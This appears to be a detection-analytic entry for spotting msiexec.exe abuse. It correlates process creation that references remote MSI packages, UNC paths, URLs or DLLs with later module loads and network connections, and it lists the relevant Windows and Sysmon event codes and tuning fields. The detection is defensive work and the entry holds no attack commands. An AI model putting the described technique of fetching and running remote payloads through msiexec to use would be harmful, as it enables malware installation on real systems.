Detection of msiexec.exe execution where command-line arguments reference remote MSI packages, UNC paths, HTTP/HTTPS URLs, or DLLs, correlated with subsequent module loads and/or network connections to previously unseen destinations. The behavioral chain links process creation of msiexec.exe with suspicious parameters, network activity to retrieve payloads, and module loading indicative of malicious installation or DLL execution.
| Data Component | Name | Channel |
|---|---|---|
| Process Creation (DC0032) | WinEventLog:Security | EventCode=4688 |
| Module Load (DC0016) | WinEventLog:Sysmon | EventCode=7 |
| Network Connection Creation (DC0082) | WinEventLog:Sysmon | EventCode=3 |
| Field | Description |
|---|---|
| SuspiciousCommandlinePatterns | Patterns for identifying malicious msiexec.exe usage (e.g., UNC paths, external domains, DLL execution flags) |
| SuspiciousDestinationList | List of external domains or IP ranges considered suspicious for msiexec network connections |
| TimeWindow | Time range in seconds/minutes for correlating msiexec.exe execution with module load and network activity |
| LegitimateMSIHashes | Hash list of MSI packages considered known-good to reduce false positives |